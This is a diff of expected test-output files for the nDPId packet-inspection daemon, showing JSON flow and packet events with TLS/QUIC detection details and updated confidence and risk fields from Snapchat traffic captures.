00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1431418008132,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431418008132,"pkt":"ABoRAAACABoRAAABCABFAAAoAeJAABAGi9tKfYiNCggAAQG7rfgRXasZ7qJU51AS\/\/8jCwAA"} @@ -14,13 +14,13 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1431418008135,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431418008135,"pkt":"ABoRAAACABoRAAABCABFAAAoAeRAABAGi9lKfYiNCggAAQG724HUfVLFK4KtO1AS\/\/\/1gQAA"} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1431418008135,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431418008135,"pkt":"ABoRAAACABoRAAABCABFAAAoOQ5AAEAGJK8KCAABSn2Ija34AbvuolTnEV2rGlAQ\/\/8jDAAA"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1431418008136,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431418008136,"pkt":"ABoRAAACABoRAAABCABFAAAowNJAAEAGnOoKCAABSn2IjduBAbsrgq071H1SxlAQ\/\/\/1ggAA"} -00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431418008131,"flow_last_seen":1431418008138,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1431418008138,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431418008133,"flow_last_seen":1431418008141,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1431418008141,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":33,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431418008131,"flow_last_seen":1431418008294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1431418008294,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":34,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431418008133,"flow_last_seen":1431418008294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1431418008294,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1431417993318,"flow_last_seen":1431417995589,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1671,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1431418008853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431418008133,"flow_last_seen":1431418008853,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1069,"flow_tot_l4_payload_len":3005,"flow_avg_l4_payload_len":176,"midstream":0,"thread_ts_msec":1431418008853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431418008131,"flow_last_seen":1431418008701,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":2439,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1431418008853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431418008131,"flow_last_seen":1431418008138,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1431418008138,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431418008133,"flow_last_seen":1431418008141,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1431418008141,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":33,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431418008131,"flow_last_seen":1431418008294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1431418008294,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":34,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431418008133,"flow_last_seen":1431418008294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1431418008294,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +00928{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1431417993318,"flow_last_seen":1431417995589,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1671,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1431418008853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1431418008133,"flow_last_seen":1431418008853,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1069,"flow_tot_l4_payload_len":3005,"flow_avg_l4_payload_len":176,"midstream":0,"thread_ts_msec":1431418008853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1431418008131,"flow_last_seen":1431418008701,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":2439,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1431418008853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","packets-captured":56,"packets-processed":56,"total-skipped-flows":0,"total-l4-payload-len":7115,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":3,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":24,"global_ts_msec":1431418008853} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 56/56 @@ -30,9 +30,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5879357 bytes -~~ total memory freed........: 5879357 bytes -~~ total allocations/frees...: 118184/118184 +~~ total memory allocated....: 6012991 bytes +~~ total memory freed........: 6012991 bytes +~~ total allocations/frees...: 120946/120946 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 456 chars ~~ json string max len.......: 1113 chars diff --git a/test/results/snapchat_call.pcapng.out b/test/results/snapchat_call.pcapng.out index 55cb367a1..f98300255 100644 --- a/test/results/snapchat_call.pcapng.out +++ b/test/results/snapchat_call.pcapng.out @@ -2,11 +2,12 @@ 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"snapchat_call.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1595865799020} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"snapchat_call.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1595865799020,"flow_last_seen":1595865799020,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1595865799020,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.184.138.142","src_port":42083,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02245{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"snapchat_call.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1595865799020,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1595865799020,"pkt":"CL6sCxdumt9Y+uvcCABFAAViAIdAAEARymzAqAypEriKjqRjAbsFTpy2w1EwNDZQw4BG53qjBuoAAAABZPU1L7U5tyJMVD1ioAEEAENITE8MAAAAUEFEAEgDAABWRVIATAMAAENDUwBcAwAAUERNRGADAABTTUhMZAMAAElDU0xoAwAATk9OUIgDAABNSURTjAMAAFNDTFOQAwAAQ1NDVJADAABDRkNXlAMAAFNGQ1eYAwAALS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tUTA0NgHogWCSkhrofu2AhqIVgpFYNTA5AQAAACgAAAAzbE4qRvvkp4rlFQIkD4jjmdOAAP5SZ2hG5WgHAg7x+2QAAAABAAAAAEAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00802{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"snapchat_call.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1595865799020,"flow_last_seen":1595865799020,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1595865799020,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.184.138.142","src_port":42083,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {}} +00802{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"snapchat_call.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1595865799020,"flow_last_seen":1595865799020,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1595865799020,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.184.138.142","src_port":42083,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {}} 02281{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"snapchat_call.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1595865799037,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1595865799037,"pkt":"mt9Y+uvcCL6sCxduCABFAAVi60BAACUR+rISuIqOwKgMqQG7pGMFThqhw1EwNDYFw4BG53qjBuoAAAABHHnqt4ztMz51vP6XgAFSRUoABwAAAFNUSwA5AAAAU05PAG0AAABQUk9GtAAAAFNDRkc7AQAAUlJFSj8BAABTVFRMRwEAAENSVP9OBwAAbUU2ixV5Jj1qHEQQZYOHtdotUTPKCy0omzKN6SE7STZ4\/rKMxZ9\/rrj8l9tx+PhU9mRQzeJZ+1Dabp0JaMw4Ax2lLo8wBUBdtg1GpS3urBIhqVx\/8nRPLB1cTLrUpB570Ce5EPUwnKR9lOYP4jBFAiB3SpfbIfQpyAe+ZsA1KXWbSYFVXmlAhM9hKVIcNwAFzwIhAKINNKjm9Y0DRmywB4GeockL0Y3PJJ2PTHmxvqAl6rucU0NGRwYAAABBRUFECAAAAFNDSUQYAAAAUFVCUzsAAABLRVhTPwAAAE9CSVRHAAAARVhQWU8AAABBRVNHQ0MyMAO\/Pud+GiRqUM930xoSwNMgAAAzgoMwBXTcjfX\/uLgWESbe\/GDn3+Z5Wy5eude5hIrxK0MyNTUy3iwBeDJ0hdzKD01zAQAADAAAAHLO80MAAAAAAQEA6ggAAHi7IlF+sTNiZQCWXKx6Bk0smxcAyyAmJgFO2z2LJtgwHuFZfF6JuflcqgEXGwewWDpny8LMbOCDWiSJGghD0i2PS2Z6Jqg4ACVbQzWg\/8FJRBYu7OrsjFmUAwsFIwNgXkJkLSMjUNYyNAJzDVJQbYOmUQ5hLmdg+knLL8rLTIQ5gV2YJzgxryRRwTc\/Dxh4hkIGAhCXcQbnJRZAMhNUKTMPj5YeMFhzMstS9TLzDSKBwuxgHzIxQr3KzMjO7MTA0igTPiXBhk\/onni666rTEwW2GV7P0HIt5RAIXKgqHG0lyz+LaQ37Sb9X68wmMzzfpJMbI+6\/war2EINr2z3pHSav6hc3MccaNDFHokTO4rnP5H\/esvQ\/kPdi4umpS28ZPuKaj1RHBL7\/ujNAPVOn37WS752O83bRN1k7DJRB0oIsMgZSTShub+JC8gdKYcjeQKjszISUlUkGCQZ6C3QWaLVpIMpKY72UTKR8UVycnKibmpysm24IrtEw1JvgV+8DKQhdDZyBxSOkYfA3h5ERX\/GLYp5zQLABBxtbeiMPMIEaVCPltXyDXNx5DdkMA1ekvGYJc3kiSLoY1TJYkgWmWEiCRSp3StBqrCbGWjYucEl5rZKJhYmliTEXiDMZ0xnKGNyWhr4u\/TVRwWDros7ML59rBXUcS\/b99dzRuvrTn4J\/ue4MDIyF97xNnBgYWJgZ3A1cmRQZZl+WnuB1dsnif3fPXLu66NVPttQQNgnXFyeSpjbviVMPvsSkkKnJ8SbX7sSrj30mcX6\/VAWXm72+rLYpIjtI\/4Pe2rlv1IH2Krm6skeGqoRNs1+o\/\/F7btsDZbXktQe862OPNcfkPeJngtqrDrdXwUB1507jl12PbQL\/ybLt+9VWcsd2\/4OdQYxPekSfzHnGdBnksoD\/k8V3L9Lbv0bDO\/WlV93k58q8IeJ7Shd\/k5gaMNlDhaGUIXDxhq9\/GSvnhOXuMK\/o51lSdUZa\/fT3eR1Os3j\/XelmfQq11x5sr5uBC5NC2tpbFwyfLJZe8nnhYvF5pYurJx\/i93xZwbWvt+mx29md\/5kUgrJ0vgl\/6lq870XJzFvZL9lvZZeX8D\/9s4v3bXp609M\/CshlE3Mmg0EakyHDDbOtMsq6skVXu5mVPu76eNXwNe+pKj\/OfovXBece+Cifdpz8TnOjJcPFhjtTSzUqxSSAWrZv6p0iOl+y6nXK3m9XXNa84pm1qPWQefDM"} 02255{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"snapchat_call.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1595865799037,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1595865799037,"pkt":"mt9Y+uvcCL6sCxduCABFAAVi60FAACUR+rESuIqOwKgMqQG7pGMFTlWjw1EwNDYFw4BG53qjBuoAAAACYTy54mZ50XnS5MjxpAEFJgJoF8maXr+sg1zn\/py4s01uT+X8o3fm32Z\/27aBGVRqMq8xaGKaAi01uU5r7HKLe2rJUVZS8PnsMSHkxhwPsDGXSFTBCa1buYUF0POAoYKBHKRMFYfrgNSNCkH5+SWw9rKxgbGBBbT4BJamyFwql91lwAIWXmqyajeyMCgxJzGwPOJwelV+Q+XeAp2UJcLnHOYoF61k4uIzt1c029EbLPLt6sSp3p+nMfUWyh25cXr5\/Lj3C57VR00SnBac\/\/rAaft1f6Pt3VWez2LXm7Zvhf7ucIn1hUv2VljJvYi2yU4R1D5jot2zuIlREZjtZA2E4BmRw4ANSDEBW4soJSBjm4EJUkmhYaBGZEnhBCkYrUGNuQWmC4zbDHEWjLAggsQEKCIgzRMDW0iJZwas2ozYWIBMBpIKO0R1gLW2QK5OmO8FmIZd9Nmd9mHxI2npw9M32V4MRUt84P7L8a4Fzt5vSk4eXX1V3sDULG9GWLXHGtbkddWzwlXCz+T\/urc6d87xbbvenHt+qjjl9n0Wcy4Gz83289XWTuxReCHfwaf1O838hMGLS4dUlrt66L5iDPAynCJ8vzf+ltZuT5vEz5Un5qRNkpqm9aXaLGKxjqNAidTltx7bLu3uYnMtNBYwqKqaoXhXZeebOVsnsa9tPnYk60f5M9N9wvzqKZuc9ze\/LA+7zdE+xV3ka7zG+sUZPs39Cd+nNVS2ZpWpzZ3Ko8Dca\/euSiM1JW3JzeZXM0vO5vnWyrzu3XR0vZi034nPoa86LARNZAXX27Ov8M+6VCKor\/WneHv8IVFn1pxrtbeY9irN9r\/8sxwAcED2UAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA